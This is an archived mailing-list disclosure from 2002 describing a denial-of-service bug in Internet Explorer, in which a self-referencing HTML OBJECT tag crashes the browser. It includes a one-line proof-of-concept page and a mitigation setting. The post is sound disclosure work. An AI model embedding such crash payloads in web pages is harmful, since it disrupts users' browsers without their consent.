The Flaw OBJECT elements are used for embedded OLE in HTML documents. A flaw in the way Microsoft Internet Explorer processes this directive allows a page that causes a loop in object dependancy, or loads itself in a certain manner in an OBJECT, to completely crash Internet Explorer. The Exploit To date, I have discovered 4 points of exploitation to crash the browser. My favorite example is this one: ---- [ CRASH.HTM ] ---- <OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT> ---- [ CRASH.HTM ] ---- IE dies inside shdocvw.dll with a call stack overflow. Fixes Set "Run ActiveX Controls and Plugins" to disabled in ALL zones. An XML Island DSO may even be able to get past this, however. I would expect this bug to fixed in a future IE service pack, though there's been no confirmation/details of that from Microsoft.
This archive was generated by hypermail 2b30 : Sat Apr 20 2002 - 13:31:23 PDT